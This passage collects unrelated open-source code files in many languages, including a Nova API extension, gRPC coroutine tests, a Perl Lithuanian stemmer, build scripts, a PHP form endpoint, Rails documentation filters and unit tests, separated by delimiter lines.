raise exc.HTTPNotFound(explanation=msg)
req.cache_db_instance(instance)
policy.enforce(context, 'compute_extension:eayun-userdata:update',
instance)
instance.update(update_dict)
instance.save()
return self._get_userdata(instance)
class Eayun_user_data(extensions.ExtensionDescriptor):
"""Add userdata extension for v2 API."""
name = "EayunUserData"
alias = "eayun-userdata"
namespace = ("www.eayun.cn")
updated = "2017-01-10T00:00:00Z"
def get_resources(self):
resources = []
res = extensions.ResourceExtension('eayun-userdata',
EayunUserDataController(
self.ext_mgr))
resources.append(res)
return resources
|
/**
* This file is part of Ark Cpp Crypto.
*
* (c) Ark Ecosystem <info@ark.io>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
**/
#ifndef SERIALIZER_H
#define SERIALIZER_H
#include "transactions/transaction.h"
namespace Ark {
namespace Crypto {
namespace Transactions {
class Serializer {
public:
Serializer(const Transaction& transaction);
std::string serialize();
private:
void serializeVendorField(std::vector<uint8_t>& bytes);
void serializeType(std::vector<uint8_t>& bytes);
void serializeTransfer(std::vector<uint8_t>& bytes);
void serializeSecondSignatureRegistration(std::vector<uint8_t>& bytes);
void serializeDelegateRegistration(std::vector<uint8_t>& bytes);
void serializeVote(std::vector<uint8_t>& bytes);
void serializeMultiSignatureRegistration(std::vector<uint8_t>& bytes);
void serializeSignatures(std::vector<uint8_t>& bytes);
Transaction _transaction;
};
} // namespace Transactions
} // namespace Crypto
} // namespace Ark
#endif
|
/*
* Copyright 2019 Kroto+ Contributors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.github.marcoferrer.krotoplus.generators
import com.github.marcoferrer.krotoplus.coroutines.launchProducerJob
import com.github.marcoferrer.krotoplus.coroutines.withCoroutineContext
import io.grpc.examples.helloworld.*
import io.grpc.testing.GrpcServerRule
import io.mockk.coEvery
import io.mockk.every
import io.mockk.slot
import io.mockk.spyk
import kotlinx.coroutines.*
import kotlinx.coroutines.channels.Channel
import kotlinx.coroutines.channels.ReceiveChannel
import kotlinx.coroutines.channels.SendChannel
import kotlinx.coroutines.channels.consumeEach
import kotlinx.coroutines.channels.toList
import org.junit.Ignore
import org.junit.Rule
import org.junit.Test
import test.message.TestMessages
import test.message.__MalformedService__CoroutineGrpc
import kotlin.coroutines.CoroutineContext
import kotlin.test.assertEquals
import kotlin.test.assertNull
import kotlin.test.BeforeTest
@UseExperimental(ObsoleteCoroutinesApi::class)
class GrpcCoroutinesGeneratorTests {
@[Rule JvmField]
var grpcServerRule = GrpcServerRule().directExecutor()
val expectedMessage = "result"
@BeforeTest
fun setupService(){
grpcServerRule.serviceRegistry.addService(object : GreeterCoroutineGrpc.GreeterImplBase(){
override val initialContext: CoroutineContext
get() = Dispatchers.Default
override suspend fun sayHello(request: HelloRequest): HelloReply {
return HelloReply { message = expectedMessage }
}
override suspend fun sayHelloClientStreaming(requestChannel: ReceiveChannel<HelloRequest>): HelloReply {
return HelloReply {
message = requestChannel.toList().joinToString(separator = "|"){ it.name }
}
}
override suspend fun sayHelloServerStreaming(
request: HelloRequest,
responseChannel: SendChannel<HelloReply>
) {
repeat(3){
responseChannel.send { message = request.name + "-$it" }
}
}
override suspend fun sayHelloStreaming(
requestChannel: ReceiveChannel<HelloRequest>,
responseChannel: SendChannel<HelloReply>
) {
requestChannel.consumeEach { request ->
repeat(3) {
responseChannel.send { message = request.name }
}
}
}
})
}
@Test
fun `Service name prop is generated`(){
assertEquals(GreeterGrpc.SERVICE_NAME, GreeterCoroutineGrpc.SERVICE_NAME)
}
@Test
fun `Method descriptors are generated`(){
assertEquals(GreeterGrpc.getSayHelloMethod(), GreeterCoroutineGrpc.sayHelloMethod)
assertEquals(GreeterGrpc.getSayHelloServerStreamingMethod(), GreeterCoroutineGrpc.sayHelloServerStreamingMethod)
assertEquals(GreeterGrpc.getSayHelloClientStreamingMethod(), GreeterCoroutineGrpc.sayHelloClientStreamingMethod)
assertEquals(GreeterGrpc.getSayHelloStreamingMethod(), GreeterCoroutineGrpc.sayHelloStreamingMethod)
}
@Test
fun `Unary rpc methods are generated`() = runBlocking {
val stub = GreeterCoroutineGrpc.newStub(grpcServerRule.channel)
assertEquals(expectedMessage,stub.sayHello(HelloRequest.getDefaultInstance()).message)
assertEquals(expectedMessage,stub.sayHello().message)
assertEquals(expectedMessage,stub.sayHello { name = "test" }.message)
}
@Test
fun `Server streaming methods with method signature are generated`() = runBlocking {
val expectedField = "anything"
val nestedMessage = TestMessages.L1Message1.L2Nested1.newBuilder()
.setField("testing")
.build()
val expectedRequest = TestMessages.L1Message1.newBuilder()
.setField(expectedField)
.setNestedMessage(nestedMessage)
.build()
val stub = spyk(__MalformedService__CoroutineGrpc.newStub(grpcServerRule.channel))
val requestSlot = slot<TestMessages.L1Message1>()
coEvery { stub.sayHelloServerStreaming(capture(requestSlot)) } returns Channel()
stub.sayHelloServerStreaming(expectedField, nestedMessage).cancel()
assertEquals(expectedRequest,requestSlot.captured)
}
@Test
fun `Unary rpc methods with method signature are generated`() = runBlocking {
val expectedField = "anything"
val nestedMessage = TestMessages.L1Message1.L2Nested1.newBuilder()
.setField("testing")
.build()
val expectedRequest = TestMessages.L1Message1.newBuilder()
.setField(expectedField)
.setNestedMessage(nestedMessage)
.build()
val stub = spyk(__MalformedService__CoroutineGrpc.newStub(grpcServerRule.channel))
val requestSlot = slot<TestMessages.L1Message1>()
coEvery { stub.sayHello(capture(requestSlot)) } returns TestMessages.L1Message2.getDefaultInstance()
stub.sayHello(expectedField, nestedMessage)
assertEquals(expectedRequest,requestSlot.captured)
}
@Test
fun `Client streaming rpc methods are generated`() = runBlocking {
val stub = GreeterCoroutineGrpc.newStub(grpcServerRule.channel)
.withCoroutineContext()
val (requestChannel, response) = stub.sayHelloClientStreaming()
launchProducerJob(requestChannel){
repeat(3){
send { name = "name $it" }
}
}
assertEquals("name 0|name 1|name 2",response.await().message)
}
@ExperimentalCoroutinesApi
@ObsoleteCoroutinesApi
@Test
fun `Server streaming rpc methods are generated`() = runBlocking {
val stub = GreeterCoroutineGrpc.newStub(grpcServerRule.channel)
.withCoroutineContext()
// Default Value Ext
val response1 = stub.sayHelloServerStreaming()
repeat(3){
assertEquals("-$it",response1.receive().message)
}
assertNull(response1.receiveOrNull())
assert(response1.isClosedForReceive)
// Single Message Parameter Ext
val response2 = stub.sayHelloServerStreaming(HelloRequest { name = "with-arg" })
repeat(3){
assertEquals("with-arg-$it",response2.receive().message)
}
assertNull(response2.receiveOrNull())
assert(response2.isClosedForReceive)
// Message Builder Ext
val response3 = stub.sayHelloServerStreaming { name = "with-block" }
repeat(3){
assertEquals("with-block-$it",response3.receive().message)
}
assertNull(response3.receiveOrNull())
assert(response3.isClosedForReceive)
}
@Test
fun `Bidi streaming rpc methods are generated`() {
runBlocking {
val stub = GreeterCoroutineGrpc.newStub(grpcServerRule.channel)
.withCoroutineContext()
val (requestChannel, responseChannel) = stub.sayHelloStreaming()
launch(Dispatchers.Default) {
repeat(3) {
requestChannel.send { name = "name $it" }
}
requestChannel.close()
}
val results = responseChannel.toList()
assertEquals(9, results.size)
val expected = "name 0|name 0|name 0" +
"|name 1|name 1|name 1" +
"|name 2|name 2|name 2"
assertEquals(
expected,
results.joinToString(separator = "|") { it.message }
)
}
}
}
|
#!/bin/bash
SUDO=sudo
if [ -z "${DOCKER_HUB_REPO}" ]; then
echo -e "Please set DOCKER_HUB_REPO env variable."
exit -1;
fi
if [ -z "${DOCKER_HUB_LCFS_PLUGIN}" ]; then
echo -e "Please set DOCKER_HUB_LCFS_PLUGIN env variable."
exit -1;
fi
if [ -z "${DOCKER_HUB_LCFS_TAG}" ]; then
echo -e "Please set DOCKER_HUB_LCFS_TAG env variable."
exit -1;
fi
# Push the plugin to docker hub
$SUDO docker plugin push $DOCKER_HUB_REPO/$DOCKER_HUB_LCFS_PLUGIN:$DOCKER_HUB_LCFS_TAG
|
package Lingua::Stem::Snowball::Lt;
use strict;
use warnings;
use 5.006002;
use Carp;
use Exporter;
use vars qw(
$VERSION
@ISA
@EXPORT_OK
$AUTOLOAD
%EXPORT_TAGS
$stemmifier
%instance_vars
);
$VERSION = '0.03';
@ISA = qw( Exporter DynaLoader );
%EXPORT_TAGS = ( 'all' => [qw( stem )] );
@EXPORT_OK = ( @{ $EXPORT_TAGS{'all'} } );
require DynaLoader;
__PACKAGE__->bootstrap($VERSION);
# Ensure that C symbols are exported so that other shared libaries (e.g.
# KinoSearch) can use them. See Dynaloader docs.
sub dl_load_flags {0x01}
# A shared home for the actual struct sb_stemmer C modules.
$stemmifier = Lingua::Stem::Snowball::Lt::Stemmifier->new;
%instance_vars = (
lang => 'lt',
encoding => 'UTF-8',
locale => undef,
stemmer_id => -1,
strip_apostrophes => 0,
);
sub new {
my $class = shift;
my $self = bless { %instance_vars, @_ }, ref($class) || $class;
# Get an sb_stemmer.
$self->_derive_stemmer;
return $self;
}
sub stem {
my ( $self, $words, $locale, $is_stemmed );
# Support lots of DWIMmery.
if ( UNIVERSAL::isa( $_[0], 'HASH' ) ) {
( $self, $words, $is_stemmed ) = @_;
}
else {
( $words, $locale, $is_stemmed ) = @_;
$self = __PACKAGE__->new( );
}
# Bail if there's no input.
return undef unless ( ref($words) or length($words) );
# Duplicate the input array and transform it into an array of stems.
$words = ref($words) ? $words : [$words];
my @stems = map {lc} @$words;
$self->stem_in_place( \@stems );
# Determine whether any stemming took place, if requested.
if ( ref($is_stemmed) ) {
$$is_stemmed = 0;
if ( $self->{stemmer_id} == -1 ) {
$$is_stemmed = 1;
}
else {
for ( 0 .. $#stems ) {
next if $stems[$_] eq $words->[$_];
$$is_stemmed = 1;
last;
}
}
}
return wantarray ? @stems : $stems[0];
}
1;
__END__
=head1 NAME
Lingua::Stem::Snowball::Lt - Perl interface to Snowball stemmer for the Lithuanian language.
=head1 SYNOPSIS
my @words = qw( niekada myliu );
# OO interface:
my $stemmer = Lingua::Stem::Snowball::Lt->new( );
$stemmer->stem_in_place( \@words ); # qw( niekad myl )
# Functional interface:
my @stems = stem( \@words );
=head1 DESCRIPTION
Stemming reduces related words to a common root form -- for instance, "horse",
"horses", and "horsing" all become "hors". Most commonly, stemming is
deployed as part of a search application, allowing searches for a given term
to match documents which contain other forms of that term.
This module is very similar to L<Lingua::Stem> -- however, Lingua::Stem is
pure Perl, while Lingua::Stem::Snowball::Lt is an XS module which provides a Perl
interface to the C version of the Lithuanian stemmer based on Snowball.
(L<http://snowball.tartarus.org>).
=head1 METHODS / FUNCTIONS
=head2 new
my $stemmer = Lingua::Stem::Snowball::Lt->new( );
die $@ if $@;
Create a Lingua::Stem::Snowball::Lt object.
=head2 stem
@stemmed = $stemmer->stem( WORDS, [IS_STEMMED] );
@stemmed = stem( WORDS, [LOCALE], [IS_STEMMED] );
Return lowercased and stemmed output. WORDS may be either an array of words
or a single scalar word.
In a scalar context, stem() returns the first item in the array of stems:
$stem = $stemmer->stem($word);
$first_stem = $stemmer->stem(\@words); # probably wrong
LOCALE has no effect; it is only there as a placeholder for backwards
compatibility (see Changes). IS_STEMMED must be a reference to a scalar; if
it is supplied, it will be set to 1 if the output differs from the input in
some way, 0 otherwise.
=head2 stem_in_place
$stemmer->stem_in_place(\@words);
This is a high-performance, streamlined version of stem() (in fact, stem()
calls stem_in_place() internally). It has no return value, instead modifying
each item in an existing array of words. The words must already be in lower
case.
=head1 AUTHORS
Lingua::Stem::Snowball was originally developed to provide
access to stemming algorithms for the OpenFTS (full text search engine)
project (L<http://openfts.sourceforge.net>), by Oleg Bartunov, E<lt>oleg at
sai dot msu dot suE<gt> and Teodor Sigaev, E<lt>teodor at stack dot netE<gt>.
Lingua::Stem::Snowball is currently maintained by Marvin Humphrey
E<lt>marvin at rectangular dot comE<gt>. Previously maintained by Fabien
Potencier E<lt>fabpot at cpan dot orgE<gt>.
Lithuanian language adaptation (Lingua::Stem::Snowball::Lt) was done by
Linas Valiukas. Lithuanian stemmer for Snowball was created by Z. Medelis,
M. Petkevicius and T. Krilavicius.
=head1 COPYRIGHT AND LICENSE
Perl bindings copyright 2004-2008 by Marvin Humphrey, Fabien Potencier, Oleg
Bartunov and Teodor Sigaev.
Lithuanian language adaptation (Lingua::Stem::Snowball::Lt) copyright 2013
by Linas Valiukas.
This software may be freely copied and distributed under the same
terms and conditions as Perl.
Snowball files and stemmers are covered by the BSD license.
Lithuanian stemmer (by Z. Medelis, M. Petkevicius, T. Krilavicius) is covered
by the Academic Free License (AFL).
=head1 SEE ALSO
L<http://snowball.tartarus.org>, L<Lingua::Stem::Snowball|Lingua::Stem::Snowball>, L<Lingua::Stem|Lingua::Stem>.
=cut
|
#!/bin/bash
cd `dirname $0`
rm -rf doc/*
luadoc -d doc hs/*.lua hs/*/*.lua
|
import { logger } from '../utils/logger';
import { mkdir, touch } from '../utils/fs';
import { npmInit } from '../actions/npm';
import { addScript, setPackageJsonValue } from '../actions/packageJson';
export const createEmptyProject = async (entryfile = 'src/index.ts') => {
await mkdir('src');
await mkdir('test');
await mkdir('dist');
await touch(entryfile);
logger.context('NPM');
logger.pending('init');
await npmInit();
logger.pending('creating config');
await setPackageJsonValue('main', 'dist/src/index.js');
await addScript('start', 'node .');
logger.success();
};
|
{-# LANGUAGE RankNTypes #-}
{-# LANGUAGE DataKinds #-}
{-# LANGUAGE ScopedTypeVariables #-}
{-# LANGUAGE TypeFamilies #-}
{-# OPTIONS_GHC -fno-warn-orphans #-}
module SMACCMPilot.Flight.Datalink
( datalink ) where
import GHC.TypeLits
import Data.Char (ord)
import Ivory.Language
import Ivory.Tower
import qualified Ivory.HXStream as H
import qualified SMACCMPilot.Flight.Datalink.AirData as A
import qualified SMACCMPilot.Flight.Datalink.RadioData as R
import qualified SMACCMPilot.Communications as C
--------------------------------------------------------------------------------
datalink :: (SingI n0, SingI n1, SingI n2, SingI n3)
=> String
-> ChannelSink n0 (Stored Uint8) -- from UART
-> ChannelSource n1 (Stored Uint8) -- to UART
-> Tower p ( ChannelSink 8 C.CommsecArray -- to decrypter
, ChannelSource 8 C.CommsecArray -- from encrypter to Hx
, ChannelSink n2 (Struct "radio_stat")
-- XXX no endpoint currently
, ChannelSink n3 (Struct "radio_info"))
datalink name istream ostream = do
framed_i <- channelWithSize
framed_o <- channelWithSize
stat_o <- channelWithSize
info_o <- channelWithSize
task ("datalink_" ++ name) $ do
decoder istream (src framed_o) (src stat_o) (src info_o)
encoder (snk framed_i) ostream
taskModuleDef $ depend H.hxstreamModule
return (snk framed_o, src framed_i, snk stat_o, snk info_o)
--------------------------------------------------------------------------------
-- | Handle either airdata or radiodata messages from the UART on link_sink.
-- De-hxstream and send on the appropriate channel (to SMACCMPilot or radio data
-- channels).
decoder :: (SingI n0, SingI n1, SingI n2, SingI n3)
=> ChannelSink n0 (Stored Uint8) -- from UART
-> ChannelSource n1 C.CommsecArray -- to Commsec
-> ChannelSource n2 (Struct "radio_stat") -- XXX no endpoint
-> ChannelSource n3 (Struct "radio_info") -- XXX no endpoint
-> Task p ()
decoder link_sink framed_src stat_src info_src = do
link_istream <- withChannelEvent link_sink "link_istream"
framed_ostream <- withChannelEmitter framed_src "framed_ostream"
stat_ostream <- withChannelEmitter stat_src "stat_ostream"
info_ostream <- withChannelEmitter info_src "info_ostream"
hx <- taskLocalInit "hx_decoder_state" H.initStreamState
airhandler <- A.airDataHandler framed_ostream
radiohandler <- R.radioDataHandler stat_ostream info_ostream
onEventV link_istream $ \v ->
noReturn $ H.decodes [airhandler, radiohandler] hx v
--------------------------------------------------------------------------------
-- | Encode airdata or generated radio data to give to either the UART task.
encoder :: (SingI n0, SingI n1)
=> ChannelSink n0 C.CommsecArray -- from commsec
-> ChannelSource n1 (Stored Uint8) -- to UART
-> Task p ()
encoder framed_snk link_src = do
link_ostream <- withChannelEmitter link_src "link_ostream"
framed_istream <- withChannelEvent framed_snk "framed_istream"
-- Send air data as quickly as we get it
onEvent framed_istream $ \frame -> noReturn $
H.encode C.airDataTag frame (emitV_ link_ostream)
-- Periodically send binary info request to radio.
onPeriod 1000 $ \_t -> noReturn $ do
(frame :: Ref (Stack s) (Array 2 (Stored Uint8))) <- local $ iarray
[ ival (charUint8 'B')
, ival (charUint8 '\r')
]
H.encode C.radioDataTag (constRef frame) (emitV_ link_ostream)
where
charUint8 :: Char -> Uint8
charUint8 = fromIntegral . ord
--------------------------------------------------------------------------------
|
<?php
header('Access-Control-Allow-Origin: http://localhost:3000');
header('Access-Control-Allow-Headers: Content-Type, x-requested-with');
header('Content-Type: text/plain; charset=utf-8');
if ($_SERVER['REQUEST_METHOD'] === "OPTIONS") {
die();
}
try {
$input = file_get_contents('php://input');
$data = json_decode($input, true);
if (!$data
|| !isset($data['date']) || !isset($data['heure'])
|| !isset($data['lat']) || !isset($data['lon'])
|| !isset($data['firstname']) || !isset($data['name']) || !isset($data['email'])
|| !$data['date'] || !$data['heure']
|| !$data['lat'] || !$data['lon']
|| !$data['firstname'] || !$data['name'] || !$data['email']) {
throw new \Exception('Missing parameters');
}
$filename = __DIR__.'/upload/data';
file_put_contents($filename, $input."\n", FILE_APPEND);
$c = 0;
$fp = fopen($filename, 'r');
if ($fp) {
while (!feof($fp)) {
$content = fgets($fp);
if($content) $c++;
}
}
fclose($fp);
echo $c;
} catch (Exception $e) {
header("HTTP/1.0 500 Internal Server Error");
echo $e->getMessage();
}
|
#!/usr/bin/perl
eval 'exec /usr/bin/perl -S $0 ${1+"$@"}'
if 0; # not running under some shell
=head1 NAME
merge_lists.pl - Iterate through a directory of lists and merge them into a single list.
=head1 SYNOPSIS
USAGE: merge_lists.pl
--input_dir=/some/dir/
--output_list=/some/path/something.list
[ --glob='*.list' ]
=head1 OPTIONS
B<--input_dir,-i>
The input directory containing the list files.
B<--output_list,-o>
The file to which the output list will be written.
B<--glob,-g>
Searches for file names with this pattern within --input_dir
B<--debug,-d>
Debug level. Use a large number to turn on verbose debugging.
B<--log,-l>
Log file
B<--help,-h>
This help message
=head1 DESCRIPTION
Because distributed processes cannot all write to the same list file, each write their
own and we use this script to merge them into a single file, after the iteration steps
are finished. Of course, this can also be used outside of workflow if you simply have
files that you want to merge.
Why not use just cat with a redirector? We could, but this allows us to log each file
as it is merged into the final version as well as do any needed sanity checking.
=head1 INPUT
The required input is simply a directory path, specified by --input_dir, containing the files
you want to merge. This will merge every file in the directory into the output
file unless you also pass a filter with the --glob option. Glob allows one to specify
many of the same patterns for file identification as using grep on the command line, such
as * ? [ ] .
=head1 OUTPUT
Each of the files will be concatenated, with no content modification, onto the end of the
output file, specified with the --output_list option. If the output file already exists
it will be overwritten.
=head1 CONTACT
Joshua Orvis
jorvis@tigr.org
=cut
use strict;
use Getopt::Long qw(:config no_ignore_case no_auto_abbrev pass_through);
use Pod::Usage;
BEGIN {
use Ergatis::Logger;
}
my %options = ();
my $results = GetOptions (\%options,
'input_dir|i=s',
'glob|g=s',
'output_list|o=s',
'log|l=s',
'debug|d=s',
'help|h') || pod2usage();
my $logfile = $options{'log'} || Ergatis::Logger::get_default_logfilename();
my $logger = new Ergatis::Logger('LOG_FILE'=>$logfile,
'LOG_LEVEL'=>$options{'debug'});
$logger = $logger->get_logger();
## display documentation
if( $options{'help'} ){
pod2usage( {-exitval => 0, -verbose => 2, -output => \*STDERR} );
}
## make sure everything passed was peachy
&check_parameters(\%options);
## open the output file
my $outputfn = $options{output_list};
open(my $ofh, ">$outputfn") || $logger->logdie("can't create output file $outputfn");
## merge each file.
use File::Find;
find sub {
my $file = $File::Find::name;
if($file =~ /$options{glob}/){
$logger->info("merging $file into $outputfn") if ($logger->is_info);
## open this file, and write it to the output file
open(my $ifh, "<$file") || $logger->logdie("can't read input file $file");
while (<$ifh>) { print $ofh $_ }
}
}, "$options{input_dir}";
exit;
sub check_parameters {
my $options = shift;
## input_dir and output_list are required
unless (defined $options{input_dir} && defined $options{output_list}) {
pod2usage({-exitval => 2, -message => "error message", -verbose => 1, -output => \*STDERR});
}
## make sure input_dir exists
if (! -e "$options{input_dir}") {
$logger->logdie("the input dir passed ($options{input_dir}) cannot be read or does not exist");
}
## handle default glob
if (! defined $options{glob}) { $options{glob} = '*' }
}
|
export class AgentSalary {
public Date: Date;
public Salary: number;
}
|
angular.module('app.components')
.component('profileSelector', {
templateUrl: 'app/components/profileSelector.html',
controller: ProfileSelectorCtrl,
controllerAs: 'profileSelector',
bindings: {
mode: '='
}
});
function ProfileSelectorCtrl (constants, preferencesProvider) {
var vm = this;
vm.selectedProfile = null;
vm.toggleMode = toggleMode;
vm.preferences = preferencesProvider.preferences;
vm.profiles = constants.profiles;
vm.selectProfile = function(id) {
preferencesProvider.preferences = constants.profiles[id].preferences;
console.log(preferencesProvider.preferences);
vm.selectedProfile = constants.profiles[id];
vm.toggleMode();
};
function toggleMode() {
vm.mode = !vm.mode;
};
return vm;
}
|
package passwordless
import (
"io/ioutil"
"mime/multipart"
"net/mail"
"regexp"
"testing"
"time"
"github.com/stretchr/testify/assert"
)
func TestEmail(t *testing.T) {
d := time.Date(2001, 2, 3, 4, 5, 6, 0, time.UTC)
e := Email{
To: "bender@ilovebender.com",
Subject: "Mom Calling",
Date: d,
}
// Empty body
m, err := mail.ReadMessage(e.Buffer())
assert.NoError(t, err)
assert.Equal(t, "bender@ilovebender.com", m.Header.Get("To"))
assert.Equal(t, "Mom Calling", m.Header.Get("Subject"))
assert.Equal(t, d.Format(time.RFC822), m.Header.Get("Date"))
// Plain body
e.AddBody("", "Hello dear")
m, err = mail.ReadMessage(e.Buffer())
assert.NoError(t, err)
assert.Equal(t, "text/plain; charset=\"UTF-8\";", m.Header.Get("Content-Type"))
body, err := ioutil.ReadAll(m.Body)
assert.NoError(t, err)
assert.Equal(t, "Hello dear\r\n", string(body))
// Additional HTML body (multipart)
e.AddBody("text/html", "<html><body>Hello dear</body></html>")
m, err = mail.ReadMessage(e.Buffer())
assert.Equal(t, "1.0", m.Header.Get("MIME-Version"))
ct := m.Header.Get("Content-Type")
re := regexp.MustCompile("^multipart/alternative; boundary=([a-z0-9]+)$")
assert.Regexp(t, re, ct)
boundary := re.FindStringSubmatch(ct)[1]
assert.NotEmpty(t, boundary)
mpr := multipart.NewReader(m.Body, boundary)
// Read first part
p, err := mpr.NextPart()
assert.NoError(t, err, "reading first part")
assert.Equal(t, "text/plain; charset=\"UTF-8\";", p.Header.Get("Content-Type"))
body, err = ioutil.ReadAll(p)
assert.NoError(t, err, "reading body of first part")
assert.Equal(t, "Hello dear", string(body))
// Read second part
p, err = mpr.NextPart()
assert.NoError(t, err, "reading second part")
assert.Equal(t, "text/html; charset=\"UTF-8\";", p.Header.Get("Content-Type"))
body, err = ioutil.ReadAll(p)
assert.NoError(t, err, "reading body of second part")
assert.Equal(t, "<html><body>Hello dear</body></html>", string(body))
// Read (non-existent) next part
p, err = mpr.NextPart()
assert.Nil(t, p)
}
|
import {always} from "common-fns";
import {Source} from "../../types";
import {map} from "./map";
import {pipe} from "../utils/pipe";
/**
* map
* --------------
*
* Transforms the contents of the stream to the provided value.
*
*/
export const mapTo = <T>(value: T) => (source$: Source<any>) => {
return pipe(source$, map(always(value)));
};
|
<?php
namespace App\Model\Employee;
use Illuminate\Database\Eloquent\Model;
use Spatie\Activitylog\Traits\LogsActivity;
class Attendance extends Model {
use LogsActivity;
protected $fillable = ['employee_id', 'employee_attendance_type_id', 'date_of_attendance', 'remarks', 'options',
];
protected $primaryKey = 'id';
protected $table = 'employee_attendances';
protected static $logName = 'employee_attendance';
protected static $logFillable = true;
protected static $logOnlyDirty = true;
protected static $ignoreChangedAttributes = ['updated_at'];
public function employee() {
return $this->belongsTo('App\Models\Employee\Employee');
}
public function attendanceType() {
return $this->belongsTo('App\Models\Configuration\Employee\AttendanceType', 'employee_attendance_type_id');
}
}
|
# Ruby to JavaScript regular expression converter
class JSRegexp
# Convert Ruby Regexp to JavaSript RegExp format
#
# @params regexp [Regexp, String] a Ruby regular expression
# @return [String] JavaSript regular expression represented as a string
class << self
def convert(regexp)
stringify(regexp)
.sub(/^\//, '')
.sub(/\/[a-z]*$/, '')
.sub('\\A', '^')
.sub('\\G', '^')
.sub('\\Z', '$')
.sub('\\z', '$')
.gsub('\\R', '')
.gsub('\\a', '')
.gsub('\\e', '')
.gsub(/\(\?#.+\)/, '')
.gsub(/\(\?-\w+:/, '(')
.gsub(/\s/, '')
end
private
def stringify(regexp) # :nodoc:
regexp.is_a?(Regexp) ? regexp.inspect : regexp.to_s
end
end
end
|
ALTER TABLE podcasts DROP CONSTRAINT unique_guids;
ALTER TABLE podcasts DROP COLUMN guid;
ALTER TABLE podcasts ADD CONSTRAINT unique_podcast_columns UNIQUE(channel_id, enclosure_url);
|
# frozen_string_literal: true
module BoltSpec
module Errors
def expect_node_error(klass, issue_code, message)
expect {
yield
}.to(raise_error { |ex|
expect(ex).to be_a(klass)
expect(ex.issue_code).to eq(issue_code)
expect(ex.message).to match(message)
})
end
end
end
|
---
company-name: Tapvalue
domain: tapvalue.com
home: http://www.tapvalue.com/Home
privacy-policy: http://www.tapvalue.com/fr/mentions-l%C3%A9gales
---
|
'use strict';
var assert = require('chai').assert;
var StateSet = require('osg/StateSet');
var Uniform = require('osg/Uniform');
var Shader = require('osg/Shader');
var Program = require('osg/Program');
var Texture = require('osg/Texture');
module.exports = function() {
test('StateSet', function() {
(function() {
var stateset = new StateSet();
var uniform;
uniform = stateset.getUniform('test');
assert.isOk(uniform === undefined, 'Check getting an non existant uniform');
stateset.addUniform(Uniform.createFloat1(1.0, 'test'));
uniform = stateset.getUniform('test');
assert.isOk(uniform !== undefined, 'Check getting an existant uniform');
})();
(function() {
var ss = new StateSet();
var t = new Texture();
ss.setTextureAttributeAndModes(1, t);
assert.isOk(
ss.getTextureAttribute(1, 'Texture') === t,
'Check texture attribute accessors'
);
ss.removeTextureAttribute(1, 'Texture');
assert.isOk(
ss.getTextureAttribute(1, 'Texture') === undefined,
'Check texture attribute has been removed'
);
})();
(function() {
var ss = new StateSet();
function getShader() {
var vertexshader = [
'',
'attribute vec3 Vertex;',
'varying vec4 position;',
'void main(void) {',
' gl_Position = vec4(Vertex,1.0);',
'}'
].join('\n');
var fragmentshader = [
'',
'precision highp float;',
'varying vec4 position;',
'void main(void) {',
' gl_FragColor = vec4(1.0, 0.0, 0.0, 1.0);',
'}',
''
].join('\n');
var program = new Program(
new Shader('VERTEX_SHADER', vertexshader),
new Shader('FRAGMENT_SHADER', fragmentshader)
);
program.trackAttributes = {};
program.trackAttributes.attributeKeys = [];
return program;
}
var s = getShader();
ss.setAttributeAndModes(s);
assert.isOk(ss.getAttribute('Program') === s, 'Check stateset program');
ss.removeAttribute('Program');
assert.isOk(ss.getAttribute('Program') === undefined, 'Check program has been removed');
})();
});
};
|
module Docs
class Rails
class EntriesFilter < Docs::Rdoc::EntriesFilter
TYPE_BY_NAME_MATCHES = {
/Assertions|::Test|Fixture/ => 'Testing',
/\AActiveRecord.+mysql/i => 'ActiveRecord/MySQL',
/\AActiveRecord.+postgresql/i => 'ActiveRecord/PostgreSQL',
/\AActiveRecord.+sqlite/i => 'ActiveRecord/SQLite',
/\AActiveRecord.+Assoc/ => 'ActiveRecord/Associations',
/\AActiveRecord.+Attribute/ => 'ActiveRecord/Attributes',
/\AActiveRecord.+ConnectionAdapters/ => 'ActiveRecord/Connection',
/\AActiveSupport.+(Subscriber|Notifications)/ => 'ActiveSupport/Instrumentation',
/\A(False|Nil|True)Class/ => 'Boolean' }
TYPE_BY_NAME_STARTS_WITH = {
'ActionDispatch::Integration' => 'Testing',
'ActionDispatch::Request' => 'ActionDispatch/Request',
'ActionDispatch::Response' => 'ActionDispatch/Response',
'ActionDispatch::Routing' => 'ActionDispatch/Routing',
'ActionView::Helpers' => 'ActionView/Helpers',
'ActiveModel::Errors' => 'ActiveModel/Validation',
'ActiveModel::Valid' => 'ActiveModel/Validation',
'ActiveRecord::Batches' => 'ActiveModel/Query',
'ActiveRecord::Calculations' => 'ActiveModel/Query',
'ActiveRecord::Connection' => 'ActiveModel/Connection',
'ActiveRecord::FinderMethods' => 'ActiveModel/Query',
'ActiveRecord::Query' => 'ActiveModel/Query',
'ActiveRecord::Relation' => 'ActiveModel/Relation',
'ActiveRecord::Result' => 'ActiveModel/Connection',
'ActiveRecord::Scoping' => 'ActiveModel/Query',
'ActiveRecord::SpawnMethods' => 'ActiveModel/Query',
'ActiveSupport::Cach' => 'ActiveSupport/Caching',
'ActiveSupport::Inflector' => 'ActiveSupport/Inflector',
'ActiveSupport::Time' => 'ActiveSupport/TimeZones',
'Rails::Application' => 'Rails/Application',
'Rails::Engine' => 'Rails/Engine',
'Rails::Railtie' => 'Rails/Railtie' }
def get_type
parent = at_css('.meta-parent').try(:content).to_s
if [name, parent].any? { |str| str.end_with?('Error') || str.end_with?('Exception') }
return 'Errors'
end
TYPE_BY_NAME_MATCHES.each_pair do |key, value|
return value if name =~ key
end
TYPE_BY_NAME_STARTS_WITH.each_pair do |key, value|
return value if name.start_with?(key)
end
super
end
def include_default_entry?
super && !skip?
end
def additional_entries
skip? ? [] : super
end
def skip?
@skip ||= !css('p').any? { |node| node.content.present? }
end
end
end
end
|
module("Faq", {
'setup': function() {
BMTestUtils.FaqPre = BMTestUtils.getAllElements();
// Override Env.getParameterByName to get verification parameters
BMTestUtils.overrideGetParameterByName();
// Create the getting_started_page div so functions have something to modify
if (document.getElementById('faq_page') == null) {
$('body').append($('<div>', {'id': 'env_message', }));
